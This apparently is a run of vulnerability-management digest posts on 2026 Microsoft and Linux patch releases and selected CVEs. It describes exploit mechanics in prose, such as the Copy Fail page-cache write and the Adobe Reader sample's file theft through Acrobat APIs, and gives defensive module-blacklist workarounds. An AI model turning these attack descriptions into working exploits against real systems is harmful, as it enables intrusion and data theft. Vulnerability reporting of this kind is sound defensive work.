May Microsoft Patch Tuesday. A total of 119 vulnerabilities, approximately 1.5 times fewer than in April. There are currently no vulnerabilities marked as actively exploited in the wild. However, there is one vulnerability with a public exploit:

🔸 EoP - Windows Kernel (CVE-2026-40369). A detailed write-up and exploit for this vulnerability were published on May 14, two days after the May MSPT. The researcher describes exploitation of the vulnerability as follows: "A single syscall from any unprivileged process — including inside Chrome's renderer sandbox — can increment arbitrary kernel memory addresses. No race conditions. No heap spray. No special tokens. 100% deterministic privilege escalation to SYSTEM."

Among the remaining ones, the following stand out:

🔹 RCE - Windows DNS Client (CVE-2026-41096). A ZDI analyst commented on this vulnerability as follows: "This patch fixes a heap-based buffer overflow in the DNS Client triggered by a malicious DNS response. No authentication or user interaction needed, and since the DNS Client runs on virtually every Windows machine, the attack surface is enormous. An attacker with a position to influence DNS responses (MitM, rogue server) could achieve unauthenticated RCE across your enterprise."

🔹 RCE - Windows Netlogon (CVE-2026-41089). The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on a domain controller by sending a specially crafted network request. Exploitation does not require credentials or user interaction, which classifies this vulnerability as wormable. Compromise of a domain controller means full compromise of the organization's entire domain. A Rapid7 analyst added in their commentary: "No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism. Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it's not clear how much reassurance defenders should take. Anyone who remembers the much-discussed CVE-2020-1472 (aka ZeroLogon) back in 2020 will note that CVE-2026-41089 offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards."

🔹 RCE - Windows TCP/IP (CVE-2026-40415). Commentary from a ZDI analyst: "This bug in the TCP/IP stack results from a use-after-free (UAF) and could allow a remote, unauthenticated threat actor to execute code without user interaction. That makes this another wormable bug. However, this one is much less likely to be exploited. The target needs to be under sustained low-memory (memory pressure) conditions, which is pretty rare."

🔹 RCE - Microsoft Word (CVE-2026-40361, CVE-2026-40364, CVE-2026-40366, CVE-2026-40367). An attacker can exploit these vulnerabilities through social engineering by sending a malicious file to a targeted victim. Successful exploitation would grant the attacker arbitrary code execution. Microsoft researchers note that the Preview Pane is an attack vector for each of these vulnerabilities.

🔹 RCE - Microsoft Office (CVE-2026-40363, CVE-2026-42831). A heap-based buffer overflow vulnerability in Microsoft Office may allow an unauthorized attacker to remotely execute arbitrary code.

🔹 RCE - Windows GDI (CVE-2026-35421). A heap-based buffer overflow vulnerability in the Windows GDI component may allow an unauthorized attacker to remotely execute arbitrary code.

🔹 RCE - Microsoft Dynamics 365 On-Premises (CVE-2026-42898). Commentary from a ZDI analyst: "It allows any authenticated user to execute code with a scope change, meaning exploitation can break out and affect resources beyond the vulnerable component itself. Scope changes are pretty rare, so if you're running Dynamics 365 On-Prem, definitely test and deploy this patch quickly."

🔹 EoP - Windows Kernel (CVE-2026-33841, CVE-2026-35420, CVE-2026-40369). CVE-2026-33841 and CVE-2026-40369 are rated "Exploitation More Likely". A local attacker can use these vulnerabilities to elevate privileges to SYSTEM level. In the case of CVE-2026-33841, the attacker can elevate privileges to Medium/High integrity level.

🗒 Full Vulristics report

About Remote Code Execution - Apache ActiveMQ (CVE-2026-34197) vulnerability. Apache ActiveMQ is a popular open-source message broker written in Java. Its main purpose is to send messages between different services, systems, and microservices without a direct connection between them.

This vulnerability is from the April Linux Patch Wednesday. Details about this vulnerability were published on April 7 in the HORIZON3.ai company blog. They claim that the Apache ActiveMQ Classic vulnerability has been hiding in plain sight for 13 years. An attacker can invoke a management operation through ActiveMQ's Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands. As a result, the attacker can gain access to sensitive information, including messages, credentials, and configuration files, deploy malware, or use the compromised server to conduct further attacks within the internal infrastructure.

The vulnerability requires credentials, but default credentials (admin:admin) are common in many environments. On some versions (6.0.0–6.1.1), no credentials are required at all due to another vulnerability, CVE-2024-32114, which inadvertently exposes the Jolokia API without authentication. In those versions, CVE-2026-34197 is effectively an unauthenticated RCE.

🛠 Public exploits have been available on GitHub since April 8.

👾 Indicators of exploitation in the wild were observed by FortiGuard experts on April 13. The vulnerability was added to the CISA KEV catalog on April 16.

🌐 According to data from The Shadowserver Foundation, as of May 14, approximately 7,000 vulnerable Apache ActiveMQ servers remain exposed on the internet.

⚙️ According to the vendor bulletin, the vulnerability has been fixed in ActiveMQ versions 5.19.4 and 6.2.3. However, according to HORIZON3.ai, it was fixed in 5.19.6 and 6.2.5. It is better to install newer versions. 😉

About Spoofing - Microsoft SharePoint Server (CVE-2026-32201) vulnerability. A vulnerability from the April Microsoft Patch Tuesday. The description provided by Microsoft experts is extremely vague: "Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network. An attacker who successfully exploited the vulnerability could view some sensitive information (Confidentiality), make changes to disclosed information (Integrity), but cannot limit access to the resource (Availability)." Spoofing is an attack in which a threat actor forges data, an address, an identifier, or a trusted source in order to impersonate a legitimate user, service, or system.

What is actually hidden behind this description? In the April review on MSPT, a ZDI expert noted that vulnerabilities of this kind in SharePoint are often associated with XSS attacks.

🛠 On April 23, an exploit was published on GitHub, whose author claims that the vulnerability can be summarized as follows: "An unauthenticated attacker can send a specially crafted HTTP request to inject malicious JavaScript (reflected XSS), which executes in the security context of the SharePoint site."

In other words, the attacker sends a specially crafted request to the SharePoint server, causing SharePoint to generate a malicious link on behalf of a trusted source. The attacker then passes this link to the user. When the user opens such a link, the injected malicious JavaScript executes in the context of SharePoint, which can be used to steal data from the current session, intercept authentication tokens, as well as perform actions on behalf of the user through the user's active session.

👾 Microsoft experts noted the vulnerability as being exploited in the wild on the day of publication of the April Microsoft Patch Tuesday, April 14. The vulnerability was added to the CISA KEV. On the same day, researchers from Defused reported coordinated reconnaissance activity targeting vulnerable SharePoint servers, which was carried out from four IP addresses between April 1 and April 11.

⚙️ Updates are available for Microsoft SharePoint Server 2016, 2019, and Subscription Edition.

About Elevation of Privilege vulnerability - Linux Kernel "Dirty Frag" (CVE-2026-43284, CVE-2026-43500) vulnerability. According to information from researcher Hyunwoo Kim (@v4bel), Dirty Frag is a vulnerability (a class of vulnerabilities) that allows a local unprivileged attacker to obtain root privileges on most Linux distributions by combining the xfrm-ESP Page-Cache Write vulnerability (CVE-2026-43284) and the RxRPC Page-Cache Write vulnerability (CVE-2026-43500). Exploitation of this chain enables the attacker to fully compromise the system: gain access to any files, disable protections, establish persistence, and use the host for further attacks.

⚙️🛠 The vulnerability chain description, technical write-up and exploit code were published on May 7. Exploitability has been confirmed on up-to-date distributions including Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44. The xfrm-ESP Page-Cache Write vulnerability has been present in the kernel since commit cac2661c53f3 (2017-01-17) and up to the current upstream version, while the RxRPC Page-Cache Write vulnerability has been present in the kernel since commit 2dc334f1a63a (2023-06) and up to the current upstream version. In other words, the actual time span during which these vulnerabilities have existed in the kernel is around 9 years.

Information about the vulnerability and the exploit was published before patches were available in affected Linux distributions. According to the researcher, on May 7 he submitted detailed information about the vulnerability and the exploit to the linux-distros mailing list. The embargo was set for 5 days, with an agreement that if a third party published the exploit on the internet during the embargo period, the "Dirty Frag" exploit would be released publicly. On the same day, this is exactly what happened: the information was leaked to the public, and the embargo was violated. 🤷‍♂️ As a result, the researcher proceeded with full disclosure.

A similar high-profile vulnerability, Elevation of Privilege - Linux Kernel "Copy Fail" (CVE-2026-31431), served as the motivation for this research. As the researcher reports, the xfrm-ESP Page-Cache Write vulnerability in the Dirty Frag chain shares the same sink as Copy Fail. However, it is triggered regardless of whether the algif_aead module is available. In other words, even on systems where the publicly known Copy Fail mitigation (algif_aead blacklist) is applied, Linux remains vulnerable to Dirty Frag.

Why is a chain of two vulnerabilities used? As the researcher reports, the xfrm-ESP Page-Cache Write vulnerability provides a powerful arbitrary 4-byte STORE primitive, similar to Copy Fail, and is present in most distributions. However, its exploitation requires the privilege to create a namespace. In Ubuntu, unprivileged user namespace creation is sometimes restricted by AppArmor policy. In such an environment, xfrm-ESP Page-Cache Write cannot be triggered. The RxRPC Page-Cache Write vulnerability does not require the privilege to create a namespace, but the rxrpc.ko module itself is not included in most distributions. However, on Ubuntu, the rxrpc.ko module is loaded by default. Chaining the two variants makes the blind spots cover each other, allowing root privileges to be obtained on every major distribution.

As of May 8, the fix for the xfrm-ESP Page-Cache Write (CVE-2026-43284) vulnerability has been merged into the mainline Linux kernel, while the fix for the RxRPC Page-Cache Write (CVE-2026-43500) vulnerability has not yet been merged. It is recommended to monitor the release of security updates for CVE-2026-43284 and CVE-2026-43500 across the Linux distributions in use and apply them promptly. As a workaround, the vulnerability researcher proposes a script that prevents loading of the esp4, esp6, and rxrpc modules, attempts to unload them from the kernel, and clears the Linux memory cache:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

About Elevation of Privilege - Linux Kernel "Copy Fail" (CVE-2026-31431) vulnerability. A local privilege escalation vulnerability in the Linux kernel AF_ALG component, which is caused by a memory handling flaw, allows an unprivileged user to escalate privileges to root. By exploiting this vulnerability, an attacker can fully compromise the system: read and modify any files, including passwords and keys, replace system binaries, disable security controls and monitoring tools, stealthily install backdoors and maintain persistence, hide traces of their activity, and use the host as a foothold for attacks on other network assets.

⚙️🛠 On April 1, patches addressing the vulnerability were merged into the main branch of the Linux kernel. On April 22, a CVE identifier was assigned to the vulnerability. On April 29, experts from Theori published an analysis of the vulnerability and a public exploit. The vulnerability's exploitability has been confirmed on up-to-date versions of widely used Linux distributions, including Ubuntu, Amazon Linux, RHEL, and SUSE.

👾 On May 1, the vulnerability was added to the CISA KEV catalog, indicating it is being exploited in the wild.

What distinguishes this vulnerability from similar EOP/LPE issues in Linux?

There have been high-profile privilege escalation vulnerabilities in the Linux kernel. Dirty COW required winning a race condition. Multiple attempts were often needed, and this sometimes led to system crashes. Dirty Pipe was tied to specific versions and required precise pipe buffer manipulation.

But unlike Dirty COW and Dirty Pipe, researchers report that Copy Fail is a straight-line logic flaw. It triggers without races, retries, or crash-prone timing windows.

🧬 Portability. The same exploit script works across all tested distributions and architectures, including Ubuntu, Amazon Linux, Red Hat Enterprise Linux (RHEL), and SUSE Linux Enterprise. No per-distribution offsets. No recompilation. No version checks in the exploit.

✧ Minimalism. The entire exploit is a short Python script using only standard library modules (os, socket, zlib). It requires Python 3.10+ for os.splice. No compiled payloads, no dependency installation.

🥷 Stealth. The write bypasses the ordinary VFS write path. The corrupted page is never marked dirty by the kernel's writeback machinery. Standard file integrity tools that compare on-disk checksums will not detect it, because the on-disk file remains unchanged. Only the in-memory page cache is corrupted.

📦 Cross-container impact. The page cache is shared across all processes on the system, including across container boundaries. Copy Fail is not just a local privilege escalation. It is a container escape primitive and a vector for Kubernetes node compromise.

How to fix the vulnerability?

To remediate the vulnerability, users need to update to Linux kernel versions 6.18.22, 6.19.12, and 7.0. The kernel can be built manually, or users can wait for their Linux distribution vendor to release updated kernel packages. As of May 4, updates have been released for Ubuntu, Debian, RHEL, Fedora, SUSE, CloudLinux, Arch Linux, and ROSA Linux.

As a workaround, researchers suggest blocking the creation of AF_ALG sockets:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

April "In the Trend of VM" (#26): one Microsoft SharePoint vulnerability. Presenting the traditional monthly roundup of trending vulnerabilities according to Positive Technologies. Once again, it is single-vendor, Microsoft-related, and this time it could not be more compact. While the previous March edition had four trending vulnerabilities, this April edition has only one. In the upcoming May edition, we expect at least three trending vulnerabilities. 😉

🗞 Post on Habr (rus)
🗒 Digest on the PT website (rus)

This vulnerability is from the January Microsoft Patch Tuesday:

🔻 RCE - Microsoft SharePoint (CVE-2026-20963). The vulnerability was initially considered less critical due to an authentication requirement PR:L, but after Microsoft’s reassessment it turned out that authentication is not required for exploitation PR:N. The vulnerability has been added to the CISA KEV, meaning attackers are already exploiting it in the wild. There are no public exploits yet.

🟥 The full list of trending vulnerabilities is available on the portal

April Linux Patch Wednesday. In April, Linux vendors addressed 1,035 vulnerabilities - nearly twice as many as in March. One might assume that most of these would again be Linux Kernel vulnerabilities, but that's not the case! Linux Kernel vulnerabilities were relatively few - just 209. The remaining vulnerabilities are distributed across more than 200 affected products. Notably, two vulnerabilities show evidence of active exploitation in the wild:

🔻 RCE - Apache ActiveMQ (CVE-2026-34197). Remote code execution is possible via the Jolokia API (/api/jolokia/) with no authentication required. The vulnerability remained hidden in the codebase for 13 years before being discovered using AI. Listed in the CISA KEV since April 16. Numerous exploits are available on GitHub.

🔻 RCE - Chromium (CVE-2026-5281). A use-after-free vulnerability in Dawn (Chromium's graphics layer and WebGPU implementation) affects Google Chrome versions prior to 146.0.7680.178. A remote attacker who has gained control of the rendering process can execute arbitrary code via a specially crafted HTML page. Listed in the CISA KEV since April 1.

Public exploits are available, or signs of their existence have been observed, for another 133 (❗️) vulnerabilities. The most notable ones, in my opinion:

🔸 RCE - Cockpit (CVE-2026-4631). Cockpit is a web‑based tool for server administration in Linux systems, enabling users to manage servers, containers, storage, and network configurations through a browser interface. An attacker with network access to the Cockpit web service can send a single HTTP request to the login page, injecting malicious SSH options or commands and executing code on the Cockpit server - all without valid credentials.

🔸 RCE - CUPS (CVE-2026-34990 + CVE-2026-34980). CUPS (Common UNIX Printing System) is a printing system for Unix‑like operating systems, including Linux and macOS. A chain of these vulnerabilities allows a remote attacker without authentication to overwrite files with root permissions over the network, effectively gaining root access on a typical Linux system.

🔸 RCE - KVM Tool (CVE-2021-45464). KVM Tool is a lightweight tool for running virtual machines based on KVM (Kernel‑based Virtual Machine) in Linux. KVM Tool prior to commit 39181fc contains an out‑of‑bounds write vulnerability, allowing a guest OS user to execute arbitrary code on the host machine.

🔸 PathTrav - tar (npm) (CVE-2026-31802, CVE-2026-24842). Prior to version 7.5.11, the npm package allowed creating a symbolic link pointing outside the extraction directory, leading to file overwrites.

Other vulnerabilities worth paying attention to:

🔸 RCE - Handlebars (CVE-2026-33937), tiemu (CVE-2017-20225), Netwide Assembler (CVE-2026-6067), openexr (CVE-2026-34545), Axios (CVE-2026-40175), hdf5 (CVE-2026-29043)
🔸 CodeInj - GLPI (CVE-2025-66417), glances (CVE-2026-30930, CVE-2026-32611), Handlebars (CVE-2026-33938, CVE-2026-33940), dynaconf (CVE-2026-33154), icalendar (CVE-2026-33635)
🔸 SFB - ormar (CVE-2026-27953), cpp-httplib (CVE-2026-34441), Safari (CVE-2026-20643), rack (CVE-2026-34835), wolfssl (CVE-2026-5194), Traefik (CVE-2026-32695), glances (CVE-2026-32632, CVE-2026-32634), Vert.x-Web (CVE-2026-1002), ecdsa (CVE-2026-33936), glibc (CVE-2026-4438), incus (CVE-2026-33542), Mongoose (CVE-2026-2968)
🔸 AuthBypass - scitokens_cpp_library (CVE-2026-32725, CVE-2026-32726), Node.js pbkdf2 (CVE-2026-32633), rack-session (CVE-2026-39324), Traefik (CVE-2026-33433), grpc (CVE-2026-33186), nltk (CVE-2026-33231)
🔸 ArbFileWrite - Rust (CVE-2026-33056)
🔸 CmdInj - Netty (CVE-2026-33870), awstats (CVE-2025-63261)
🔸 EoP - Keycloak (CVE-2026-4636), QEMU (CVE-2026-33711), glances (CVE-2026-33641)

🗒 Full Vulristics report

April Microsoft Patch Tuesday. A total of 167 vulnerabilities, about twice as many as in March. There is one vulnerability already being exploited in the wild:

🔻 Spoofing - Microsoft SharePoint Server (CVE-2026-32201). ZDI experts say "Spoofing bugs in SharePoint often manifest as cross-site scripting (XSS) bugs". "An attacker who successfully exploited the vulnerability could view some sensitive information (Confidentiality), make changes to disclosed information (Integrity), but cannot limit access to the resource (Availability)". There is no info yet about how widely it is being used in attacks, but you should not delay patching, especially if SharePoint is exposed to the Internet.

Formally, there are no public exploits yet. However, there are strong indications that a public exploit may already exist for one vulnerability.

🔸 EoP - Microsoft Defender (CVE-2026-33825). "Insufficient granularity of access control" in Microsoft Defender allows a logged-in attacker to gain higher privileges on a local system. Tenable and ZDI say the bug looks similar to the BlueHammer zero-day, for which a public exploit was released on GitHub on April 3. The researcher who published it, Chaotic Eclipse, criticized Microsoft’s disclosure process. ZDI says the exploit is real, but exploitation is unstable and not always reliable.

Other important issues:

🔹 RCE - Windows Active Directory (CVE-2026-33826). To exploit this, the attacker must have an account. The attacker sends a specially crafted RPC request to a vulnerable server, which can lead to code execution. Microsoft says the attacker must be in the same restricted Active Directory domain as the target system.

🔹 RCE - Windows Internet Key Exchange (IKE) Service Extensions (CVE-2026-33824). ZDI says this vulnerability is wormable, meaning it could allow malware to spread automatically between systems. It affects systems with IKE enabled, which creates a large attack surface. Microsoft recommends blocking UDP ports 500 and 4500 at the network edge. However, attackers inside the network can still use it for lateral movement. Patch quickly if you use IKE.

🔹 RCE - Windows TCP/IP (CVE-2026-33827). ZDI also says this may be wormable, especially on systems using IPv6 and IPSec. A race condition makes it harder to exploit, but similar bugs are often exploited at Pwn2Own, so you should not rely on that difficulty. If you use IPv6, test and deploy the patch quickly before exploits appear.

🔹 EoP - Windows Push Notifications (CVE-2026-26167). This Patch Tuesday includes several sandbox escape vulnerabilities, including in Push Notifications, AFD for Winsock, Windows Management Services, and User Interface Core. CVE-2026-26167 (Push Notifications) is the most important because it is the only one with low attack complexity. The others require winning a race condition (AC:H).

🔹 Spoofing - Remote Desktop (CVE-2026-26151). Weak warnings in the Remote Desktop interface allow a network attacker to trick a user into opening a specially crafted file, leading to spoofing. The issue was found by the UK National Cyber Security Centre (NCSC).

🗒 Full Vulristics report

About Remote Code Execution - Adobe Reader (CVE-2026-34621) vulnerability. Adobe Acrobat Reader (from 2003 to 2015, "Adobe Reader") is a free PDF viewer developed by Adobe. Versions are available for Windows, macOS, Android, and iOS. The remote code execution vulnerability in Adobe Acrobat for Windows and macOS is caused by improper handling of object prototype attributes (CWE-1321 - "Prototype Pollution"). Successful exploitation of the vulnerability allows an attacker to execute arbitrary code on the target system when the victim opens a specially crafted document.

👾 Researcher Haifei Li, the developer of EXPMON - a sandbox-based system designed to detect file-based zero-days and hard-to-detect exploits - reported the vulnerability and the existence of a working exploit on April 7. Earlier, on March 26, an unknown individual uploaded a malicious PDF sample named yummy_adobe_exploit_uwu.pdf to the public EXPMON service.

According to the analysis results, the sample behaved like an initial exploit capable of collecting and transmitting various types of information to the attacker, potentially followed by arbitrary code execution (RCE) and sandbox escape (SBX) exploits. It used a zero-day vulnerability in Adobe Reader that allowed it to invoke privileged Acrobat APIs. The exploit was confirmed to work on the latest version of Acrobat. Specifically, it abused the "util.readFileIntoStream()" API, which allows arbitrary files accessible to the isolated Reader process to be read from the local system. This enabled the malware to collect a wide range of information from the victim's machine and steal data from local files. The "RSS.addFeed()" API was used to send the collected information to a remote server and retrieve additional JavaScript code for execution. Such a mechanism allows attackers to gather user information, steal local data, perform advanced fingerprinting, and further develop the attack. If the target matched the attacker's criteria, an additional exploit could then be delivered to achieve RCE or SBX. However, during testing, the researcher was unable to obtain the additional exploit payload - although the server was reachable, it did not respond. This may have been caused by several factors. For example, the local testing environments may not have matched the specific criteria expected by the attacker.

On April 8, another malicious file sample was discovered on VirusTotal. The file had originally been uploaded on November 28, 2025, indicating that this 0day/APT campaign had been active for at least four months.

On April 9, researcher Gi7w0rm reported signs of active exploitation of the vulnerability in attacks. The attacks used malicious Russian-language documents disguised as materials related to Russia's oil and gas sector as phishing lures. Based on the observed targeting, the campaign appears to have been aimed at specific Russian organizations.

On April 13, the vulnerability was added to the CISA KEV catalog.

⚙️ The Adobe security bulletin was published on April 12. Affected versions include Acrobat DC 26.001.21367 and earlier, Acrobat Reader DC 26.001.21367 and earlier, and Acrobat 2024 24.001.30356 and earlier. The vulnerability has been fixed in Acrobat DC 26.001.21411, Acrobat Reader DC 26.001.21411, and Acrobat 2024 (Windows: 24.001.30362/Mac: 24.001.30360).

Adobe recommends that users of affected versions update their applications via “Help > Check for Updates”, which triggers the automatic update process. Alternatively, users can download the Acrobat Reader installer directly from Adobe's official portal.

The bulletin notes that Adobe is aware of active exploitation of vulnerability CVE-2026-34621 in the wild.

🛠 No public exploits have been observed so far.

💡 PDF files received from untrusted or unexpected sources should always be treated with caution and opened in isolated (sandboxed) environments. 😉

About Remote Code Execution - Microsoft SharePoint (CVE-2026-20963) vulnerability. This vulnerability was fixed in the January MSPT. At the time of the MSPT release on January 13, VM vendors did not highlight this vulnerability in their reviews, and Microsoft reported no evidence of exploitation in the wild. The CVSS vector was initially rated as CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8). The "PR:L" indicates that authentication was required to exploit the vulnerability. However, on March 17, Microsoft updated both the vulnerability description and its CVSS vector. The updated CVSS vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8). The "PR:N" indicates that authentication is not required for exploitation.

Current vulnerability description:

"Deserialization of untrusted data (CWE-502) in Microsoft Office SharePoint allows an unauthorized attacker to execute code over a network. In a network-based attack, an unauthenticated attacker could write arbitrary code to inject and execute code remotely on the SharePoint Server."

👾 On March 18, the vulnerability was added to the CISA KEV catalog. No detailed information about exploitation is available yet, and there are currently no public exploits. However, in terms of potential impact, this vulnerability may be comparable to last year's RCE "ToolShell" (CVE-2025-49704).

The situation surrounding this vulnerability demonstrates that the criticality of any vulnerability cannot be determined once and for all. Indicators of exploitation in the wild or public exploits may emerge at any time, and the vendor may also revise the vulnerability description and CVSS metrics for various reasons. Therefore, all vulnerabilities detected within an infrastructure must be continuously monitored (either internally or via a VM vendor), with their criticality regularly reassessed and remediation deadlines adjusted accordingly.

Given that the status of any specific vulnerability may change at any time, it is not advisable to dismiss vulnerabilities as definitively non-critical or non-exploitable. A responsible approach assumes that all detected vulnerabilities require remediation, prioritized according to their continuously updated risk levels.